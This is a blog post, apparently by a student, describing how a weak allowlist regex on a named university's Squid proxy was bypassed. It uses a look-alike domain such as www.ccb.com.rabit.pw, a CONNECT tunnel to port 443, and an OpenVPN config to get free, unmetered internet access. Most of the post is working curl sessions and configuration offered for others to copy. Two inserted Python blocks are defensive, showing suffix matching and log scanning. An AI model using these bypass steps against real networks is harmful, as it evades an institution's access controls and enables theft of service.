Next Generation Campus Network Free Flow

A catch-up post on the recently discovered method of getting free traffic on the campus network. Recalling the CDN whitelist vulnerability, the proxy could be used in a variety of ways. For a while, I used it to bypass the campus Wi-Fi AP isolation (hahaha), and it seems to have spread from me (hahaha). Since it was fixed, there have been almost no cost-effective free-traffic methods recently to pay less than a dozen dollars. Although this proxy also supports HTTP CONNECT, the conditions for using it are very strict; feel free to open fire.

A brief account of how it was discovered and how to use it.

Discovery

I found this proxy through the network center's blog; it was set up to “make it convenient for students to sign up for campus card transfers”. My guess was that CCB (China Construction Bank) would be on the whitelist, so I just tried it on the command line.

% all_proxy=http://proxy.neu.edu.cn:3128 curl -v http://www.ccb.com.cn
* Rebuilt URL to: http://www.ccb.com.cn/
*   Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
> GET http://www.ccb.com.cn/ HTTP/1.1
> Host: www.ccb.com.cn
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 OK
< Date: Sun, 20 Nov 2016 14:50:19 GMT
< Server: Apache
< Accept-Ranges: bytes
< Cache-Control: max-age=0
< Expires: Sun, 20 Nov 2016 14:50:19 GMT
< Vary: Accept-Encoding,User-Agent
< Content-Length: 2060
< Content-Type: text/html; charset=UTF-8
< X-Cache: MISS from proxy
< X-Cache-Lookup: MISS from proxy:3128
< Via: 1.1 proxy (squid/3.3.8)
< Connection: keep-alive
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm
...
<div class="tips">
  <div class="title"><img src="http://www.ccb.com/cn/img/jump/ico_tips.gif" />重要提示:</div>
    <div class="text">为了保证您正常访问建设银行网站,请您输入<span><a href="http://www.ccb.com">www.ccb.com</a></span></div>
</div>
...

Let’s see what a failed match looks like.

% all_proxy=http://proxy.neu.edu.cn:3128 curl -v http://www.baidu.com
* Rebuilt URL to: http://www.baidu.com/
*   Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
> GET http://www.baidu.com/ HTTP/1.1
> Host: www.baidu.com
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 403 Forbidden
< Server: squid/3.3.8
< Mime-Version: 1.0
< Date: Sun, 20 Nov 2016 14:47:59 GMT
< Content-Type: text/html
< Content-Length: 3136
< X-Squid-Error: ERR_ACCESS_DENIED 0
< Vary: Accept-Language
< Content-Language: en
< X-Cache: MISS from proxy
< X-Cache-Lookup: NONE from proxy:3128
< Via: 1.1 proxy (squid/3.3.8)
< Connection: keep-alive
<
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
...

It is obviously a Squid proxy, and the port is visible too.

But… well… it turns out that I had typed the wrong domain name. Still, in this case, if the administrator was lazy when writing the regex, it was probably written simply as *.ccb.com*.

% all_proxy=http://proxy.neu.edu.cn:3128 curl -v http://www.ccb.com                             1 ↵
* Rebuilt URL to: http://www.ccb.com/
*   Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
> GET http://www.ccb.com/ HTTP/1.1
> Host: www.ccb.com
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 OK
< Date: Sun, 20 Nov 2016 14:49:11 GMT
< Server: Apache
< Accept-Ranges: bytes
< Cache-Control: max-age=0
< Expires: Sun, 20 Nov 2016 14:49:11 GMT
< Vary: Accept-Encoding
< Content-Length: 86
< Content-Type: text/html; charset=UTF-8
< Set-Cookie: BIGipServerccvcc_jt_197.1_80_web_pool=1361249034.20480.0000; path=/
< X-Cache: MISS from proxy
< X-Cache-Lookup: MISS from proxy:3128
< Via: 1.1 proxy (squid/3.3.8)
< Connection: keep-alive
<
<SCRIPT LANGUAGE="JavaScript">
  window.location="/cn/home/indexv3.html";
</SCRIPT>

Use

Hehe, then try it with my own domain name. Start a simple server with Python to accept the request.

all_proxy=http://proxy.neu.edu.cn:3128 curl -v http://www.ccb.com.rabit.pw:8080
* Rebuilt URL to: http://www.ccb.com.rabit.pw:8080/
*   Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
> GET http://www.ccb.com.rabit.pw:8080/ HTTP/1.1
> Host: www.ccb.com.rabit.pw:8080
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 OK
< Server: SimpleHTTP/0.6 Python/3.5.2
< Date: Sun, 20 Nov 2016 14:56:01 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 367
< X-Cache: MISS from proxy
< X-Cache-Lookup: MISS from proxy:3128
< Via: 1.1 proxy (squid/3.3.8)
< Connection: keep-alive
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="fucktyou">fucktyou</a></li>
<li><a href="go">go</a></li>
</ul>
<hr>
</body>
</html>
* Connection #0 to host proxy.neu.edu.cn left intact
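
Why the four requests above got the answers they did, as an added example that is not code from the original post. It assumes the proxy's rule behaves like the guessed `*.ccb.com*` (the real Squid configuration is not shown on the page) and compares it with whole-suffix matching against an assumed allowlist containing only `ccb.com`.

```python
import re

# Assumption: the proxy's rule behaves like the post's guess "*.ccb.com*",
# i.e. an unanchored pattern searched anywhere in the requested host.
LAX_RULE = re.compile(r"\.ccb\.com")

# Hardened form: list each permitted domain and match it as a whole suffix.
ALLOWED_DOMAINS = ("ccb.com",)  # assumption: the one domain meant to be reachable


def normalize(host: str) -> str:
    """Lower-case the host and drop any :port and trailing root dot."""
    host = host.strip().lower()
    if ":" in host:
        host = host.rsplit(":", 1)[0]
    return host.rstrip(".")


def lax_allows(host: str) -> bool:
    return LAX_RULE.search(normalize(host)) is not None


def strict_allows(host: str) -> bool:
    h = normalize(host)
    return any(h == d or h.endswith("." + d) for d in ALLOWED_DOMAINS)


# Hosts and proxy status codes copied from the curl sessions in the post.
OBSERVED = {
    "www.ccb.com.cn": 200,
    "www.baidu.com": 403,
    "www.ccb.com": 200,
    "www.ccb.com.rabit.pw:8080": 200,
}


def compare() -> dict:
    """Map host -> (observed status, lax verdict, strict verdict)."""
    return {h: (s, lax_allows(h), strict_allows(h)) for h, s in OBSERVED.items()}


if __name__ == "__main__":
    for host, (status, lax, strict) in compare().items():
        print(f"{host:28} observed={status} lax={lax!s:5} strict={strict}")
```

The lax rule reproduces all four observed results, while suffix matching admits only `www.ccb.com`. In Squid, the `dstdomain` ACL type performs this kind of suffix match without a regex.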

OK, we now have a connection to the public network. Next, try an HTTP CONNECT tunnel; a loophole without this capability would not be of much use. Here I use mitmproxy as a reverse proxy in front of the http.server I just started, and the port remains unchanged.

all_proxy=http://proxy.neu.edu.cn:3128 curl -v https://www.ccb
* Rebuilt URL to: https://www.ccb.com.rabit.pw:8080/
*   Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
* Establish HTTP proxy tunnel to www.ccb.com.rabit.pw:8080
> CONNECT www.ccb.com.rabit.pw:8080 HTTP/1.1
> Host: www.ccb.com.rabit.pw:8080
> User-Agent: curl/7.43.0
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 403 Forbidden
< Server: squid/3.3.8

Well, it seems that the proxy configuration restricts which target ports CONNECT is allowed to reach. So I map my port to 443.

all_proxy=http://proxy.neu.edu.cn:3128 curl -v https://www.ccb.com.rabit.pw
* Rebuilt URL to: https://www.ccb.com.rabit.pw/
*   Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
* Establish HTTP proxy tunnel to www.ccb.com.rabit.pw:443
> CONNECT www.ccb.com.rabit.pw:443 HTTP/1.1
> Host: www.ccb.com.rabit.pw:443
> User-Agent: curl/7.43.0
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 Connection established
<
* Proxy replied OK to CONNECT request
* SSL certificate problem: Invalid certificate chain
* Closing connection 0
curl: (60) SSL certificate problem: Invalid certificate chain
More details here: http://curl.haxx.se/docs/sslcerts.html
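
From the proxy operator's side, both CONNECT attempts above leave a record in Squid's access log. The following added example (not from the original post) scans log lines in Squid's native format for successful tunnels whose host embeds an allowlisted domain without actually ending in it. The sample lines, client addresses and byte counts are constructed, and the `ccb.com` allowlist is an assumption.

```python
ALLOWED_DOMAINS = ("ccb.com",)  # assumption: domains the proxy is meant to serve

# Constructed sample in Squid's native access.log format (not from the post):
# time elapsed client result/status bytes method target ident hierarchy type
SAMPLE_LOG = """\
1479653761.204  61873 192.0.2.17 TCP_MISS/200 5242880 CONNECT www.ccb.com.rabit.pw:443 - HIER_DIRECT/198.51.100.9 -
1479653770.010    412 192.0.2.23 TCP_MISS/200 18211 CONNECT www.ccb.com:443 - HIER_DIRECT/198.51.100.40 -
1479653775.530      0 192.0.2.17 TCP_DENIED/403 3520 CONNECT www.ccb.com.rabit.pw:8080 - HIER_NONE/- text/html
1479653780.000     95 192.0.2.31 TCP_MISS/200 2060 GET http://www.ccb.com/ - HIER_DIRECT/198.51.100.40 text/html
"""


def embeds_allowed_domain(host: str) -> bool:
    """True when an allowlisted domain sits inside host but host is not under it."""
    h = host.lower().rstrip(".")
    if any(h == d or h.endswith("." + d) for d in ALLOWED_DOMAINS):
        return False  # genuinely inside an allowed domain
    return any(f".{d}." in f".{h}" for d in ALLOWED_DOMAINS)


def suspicious_tunnels(log_text: str) -> list:
    """Return established CONNECT tunnels to look-alike hosts."""
    hits = []
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 7 or f[5] != "CONNECT":
            continue
        status = f[3].rpartition("/")[2]
        host, sep, port = f[6].rpartition(":")  # CONNECT target is host:port
        if not sep or not port.isdigit():
            continue
        if status == "200" and embeds_allowed_domain(host):
            hits.append({"client": f[2], "host": host,
                         "port": int(port), "bytes": int(f[4])})
    return hits


if __name__ == "__main__":
    for hit in suspicious_tunnels(SAMPLE_LOG):
        print(hit)
```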

OK, we now have a free public internet connection on TCP port 443. The rest is easy. First, deploy an OpenVPN server using the TCP protocol on www.ccb.com.your.domain:443, preferably with tun, then add a few lines to the default configuration file, and it will be OK.

http-proxy proxy.neu.edu.cn 3128
# Campus network ranges bypass the proxy
route 58.154.160.0 255.255.224.0 net_gateway
route 58.154.192.0 255.255.192.0 net_gateway
route 58.195.85.192 255.255.255.240 net_gateway
route 58.200.30.128 255.255.255.128 net_gateway
route 118.202.0.0 255.255.224.0 net_gateway
route 118.202.32.0 255.255.240.0 net_gateway
route 202.118.0.0 255.255.224.0 net_gateway
route 202.199.0.0 255.255.240.0 net_gateway
route 202.206.16.0 255.255.248.0 net_gateway
route 210.30.192.0 255.255.240.0 net_gateway
route 219.216.64.0 255.255.192.0 net_gateway
route 172.16.0.0 255.240.0.0 net_gateway

As for other approaches, there is a modified version of SS with an HTTP header, and tinyproxy with a pseudo-header. Refer to other free-traffic methods and develop them yourself~